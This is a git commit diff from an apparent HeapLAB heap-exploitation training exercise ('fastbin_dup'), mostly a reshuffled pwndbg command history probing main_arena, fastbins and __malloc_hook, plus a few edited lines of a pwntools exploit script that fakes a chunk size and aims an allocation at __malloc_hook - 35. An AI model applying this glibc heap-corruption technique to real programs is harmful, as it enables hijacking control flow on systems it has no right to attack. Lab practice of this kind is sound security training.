modified: HeapLAB/challenge-fastbin_dup/.gdb_history

modified:   HeapLAB/challenge-fastbin_dup/bruh.py
Brett Weiland 2021-01-04 18:48:38 -06:00
parent ba02c1bd69
commit 4c06c05f4e
2 changed files with 225 additions and 224 deletions
HeapLAB/challenge-fastbin_dup

@ -1,224 +1,3 @@
x &main_arena
x/100x &main_arena
print main_arena
fastbins
q
fastbins
fastbins
c
exit
quit
quit
fastbins
print main_arena
q
print main_arena
q
vis_heap_chunks
print main_arena
db main_arena
db &main_arena
db &main_arena/100
db &main_arena 100
db &main_arena 1000
x main_arena.top
x &main_arena.top
db &main_arena 100
c
fastbins
print main_arena
x main_arena.fasbinsY
x &main_arena.fastbinsY
quit
fastbins
x 0x7f0946700b70
db 0x7f0946700b70 100
q
fastbins
q
fastbins
q
fastbinsx
db &main_arena 100
q
db 0x7f2e5c845b60
0x7f2e5c845b70 + 16
x 0x7f2e5c845b70 + 16
x 0x7f2e5c845b70
x 0x7f2e5c845b70
x 0x7f2e5c845b60
vis_heap_chunks
db 0x7f0ba6e3db70
db 0x555bdeaca000 100
db 0x7f0ba6e3db70
db 0x7f0ba6e3db70 - 8
db 0x7f0ba6e3db70-8
db 0x7f0ba6e3db70-7
q
x 0x7fcf882cbb69
db 0x7fcf882cbb69
q
vis_heap_chunks
print main_arena
q
print main_arena
vis_heap_chunks
q
print main_arena
q
print main_arena
fastbins
r
q
r
c
fastbisn
vis_heap_chunks
fastbins
quit
fastbins
print main_arena
c
print main_arena
q
print main_arena
print main_arena
x malloc_free_hook
x __free_hook
x &__free_hook
x &__free_hook 100
db &__free_hook 100
q
q
q
q
print main_arena
db 0x7f4858584e10
c
print victim
q
fastbins
c
x idx
x chunksize(p)
x chunksize
x p
fastbins
q
x __free_hook
x &__free_hook 100
db &__free_hook 100
db &__free_hook - 100
db &__free_hook-100
db &__free_hook-100 100
print main_arena
x 0x7fca0f75fe10
x/100 0x7fca0f75fe10
x/100 0x7fca0f75fe10-100
c
q
break malloc
c
fastbins
x __free_hook
fastins
fastbins
print main_arena
x 0x7f072b59ee10
break malloc
break free
continue
c
c
c
print main_arena
vis_heap_chunks
vis_heap_chunks
c
vis_heap_chunks
break free
break malloc
c
print main_arena
x &__free_hook - 16
q
print main_arena
vis_heap_chunks
c
c
c
q
db __malloc_hook
db &__malloc_hook
x __malloc_hook
x &__malloc_hook
c
break sysmalloc
c
frame 2
context
c
break main
c
q
x &__malloc_hook
print __malloc_hook
print &__malloc_hook
print __main_arena
print main_arena
print main_arena
x __malloc_hook
x &__malloc_hook
db &__malloc_hook
db &__malloc_hook-100 100
db &__malloc_hook-100 100*8
db &__malloc_hook-100 (100*8)+1
fastbins
c
print main_arena
x __malloc_hook
x &__malloc_hook
db &__malloc_hook-100 (100*8)+1
c
db &__malloc_hook-100 (100*8)+1
print main_arena
x 0x7f5b07a18b40
break malloc
c
c
c
q
break __libc_malloc
break malloc
break __malloc_hook
b __malloc_hook
b &__malloc_hook
b *__malloc_hook
b *&__malloc_hook
c
delete 3
c
pwndbg heap
vis_heap_chunks
print __mallinfo
x __mallinfo
print &__mallinfo
print *__mallinfo
print __mallinfo
print &__mallinfo
print main_arena
c
break malloc
c
x main_arena.top_check
x main_arena.top_chunk
print main_arena
x 0x7f4854db6b40
x 0x7f4854db6b40
x 0x7f4854db6b40
c
x 0x7f4854db6b40
fastbins
c
x 0x7f4854db6b40
c
@ -254,3 +33,224 @@ fastbins
r
c
quit
db main_arena
db &main_arena.fastbinsY
q
r
c
c
fastbins
print &main_arena
print main_arena
c
print main_arena
db main_arena
db &main_arena
db &main_arena/100
db &main_arena 100
db &main_arena 1000
q
db main_arena.bins
db &main_arena.fastbinsY
run
c
c
q
r
c
fastbins
c
fastbins
c
fastbins
r
c
c
r
1
c
c
print main_arena
x __malloc_hook
x &__malloc_hook
x 0x7ffff7dd0bc0
x &main_arena
q
print &main_arena
print main_arena
db main_arena
db &main_arena 100
print main_arena
print &main_arena
db &main_arena
db &main_arena + 1
db &main_arena+1
find_fake_fast main_arena.fastbinsY
find_fake_fast &main_arena.fastbinsY
x &main_arena.fastbinsY
db main_arena
db &main_arena
db &main_arena+1
db &main_arena+0
dq &main_arena+0
dq &main_arena+1
x/x 00007fc130a1cb60
x/x 0x00007fc130a1cb60
x/x 0x7fc130a1cb69
x main_arena
x &main_arena
x 0x0x7fc130a1cb68
x 0x7fc130a1cb68
x 0x7fc130a1cb68+1
x/10x 0x7fc130a1cb68+1
x/10x 0x7fc130a1cb68+0
x/10x 0x7fc130a1cb68+1
x/10x 0x7fc130a1cb69
db 0x7fc130a1cb69
db 0x7fc130a1cb71
db 0x7fc130a1cb70
x main_arena
print &main_arena
db &main_arena+1
dq &main_arena+1
q
x 0x7f7151e3cb70
db 0x7f7151e3cb70
db main_arena
db &main_arena
print main_arena
x main_arena
print &main_arena
db 0x7f7151e3cb69
db 0x7f7151e3cb68
db 0x7f7151e3cb67
db 0x7f7151e3cb68
db 0x7f7151e3cb69
dq 0x7f7151e3cb69
db 0x7f7151e3cb69
db 0x7f7151e3cb67
db 0x7f7151e3cb69
db 0x7f7151e3cb68
find_fake_fast main_arena
find_fake_fast &main_arena
db 0x7f7151e3cb68
db 0x7f7151e3cb69
db 0x7f7151e3cb67
db 0x7f7151e3cb68
db 0x7f7151e3cb70
db 0x7fc130a1cb69
db 0x7f7151e3cb70
db 0x7f7151e3cb69
find_fake_fast &__free_hook
find_fake_fast &__realloc_hook
find_fake_fast &__memalign_hook
find_fake_fast &__malloc_initialize_hook
find_fake_fast &__after_morecore_hook
find_fake_fast q
q
quit
q
fastbins
c
frame 4
context code
x 0x7fd533e9cb68
db 0x7fd533e9cb68
x fastbins
print main_heap
print &main_heap
print &main_arena
print main_arena
db 0x7fee89f0ee10
db 0x7fee89f0ee10 10
db 0x7fee89f0ee10 48
db 0x7fee89f0ee10-3 48
db 0x7fee89f0ee10-3 (16*4)
db 0x7fee89f0ee10
db 0x7fee89f0ee10 - 1
db 0x7fee89f0ee10-1
db 0x7fee89f0ee10-1 1
db 0x7fee89f0ee10-1 32
db 0x7fee89f0ee10-1 (48)
db 0x7fee89f0ee10-1 (48 * 3)
db 0x7fee89f0ee10-1 (48*3)
db 0x7fee89f0ee10-1
db 0x7fee89f0ee10
q
print main_arena
x 0x7fdb92f8ee10
c
find_fake_fast &malloc_hook
find_fake_fast &__malloc_hook
x __malloc_hook
x &__malloc_hook
x &__malloc_hook
x &__malloc_hook - 16
x &__malloc_hook
db &__malloc_hook-100
db &__malloc_hook-100 100
db &__malloc_hook-1
db &__malloc_hook
db &__malloc_hook-48 48
db &__malloc_hook-48 48 * 8
db &__malloc_hook-48 48*8
db &__malloc_hook-48*8 48
db &__malloc_hook-80*8 80
db &__malloc_hook-160*8 80
db &__malloc_hook-160 80
db -h
db &__malloc_hook
x __malloc_hook
x &__malloc_hook
x __malloc_hook-100
x &__malloc_hook-100
x &__malloc_hook-100 100
x &__malloc_hook-100 100
db &__malloc_hook-100 100
db &__malloc_hook-100 100*8
print (void*)&malloc_hook
print (void*)&__malloc_hook
db &__malloc_hook-100 101*8
db &__malloc_hook-100 101*8
db &__malloc_hook-100 100*8
db &__malloc_hook-100
db &__malloc_hook-(16*9)
db &__malloc_hook-(16*9) 16*9
db &__malloc_hook-(10) (10*16)
db &__malloc_hook-(10) (10*8)
db &__malloc_hook-(1) (10*8)
db &__malloc_hook-(11
db &__malloc_hook
db &__malloc_hook-1
db &__malloc_hook-8
db &__malloc_hook
db &__malloc_hook-32
db &__malloc_hook-(32/8)
db &__malloc_hook-(32/8) 1
db &__malloc_hook-(32/8) 10
db 0x7f5575614b2a 1
db 0x7f5575614b2a
db 0x7f5575614b20
db &__malloc_loc
db &__malloc_hook-(16) (16*8)
print (void*)__malloc_hook
print (void*)&__malloc_hook
db 0x7f5575614b36
0x7f5575614b2a
find_fake_fast
find_fake_fast &__malloc_hook
print (void*)&__malloc_hook
exit
quit
print main_arena
x 0x7f265fd4cb2d
x 0x7f265fd4cb2d
db 0x7f265fd4cb2d
print (void*)&__malloc_hook
find_fake_fast &__malloc_hook
db 0x7f265fd4cb2d
db 0x7f265fd4cb2d - 1
db 0x7f265fd4cb2d-1
db
c
db &__malloc_hook-(16) (16*8)

@ -55,7 +55,7 @@ free(chunk1)
#malloc(24, p64(libc.sym.main_arena + 96))
#this sets up a fake size field in the fastbins
malloc(24, p64(0x81))
malloc(24, p64(0x80))
malloc(24, 'asdf')
malloc(24, 'asdf')
@ -74,9 +74,10 @@ malloc(119, 'sdfg')
#8 * 9
malloc(119, p64(0)*9 + p64(libc.sym.__free_hook - 16))
payload_loc = libc.sym.__malloc_hook - 35
malloc(119, p64(0)*9 + p64(payload_loc))
print(hex(fake_chunk_loc))
print("top chunk addr: {}".format(hex(payload_loc)))
# =============================================================================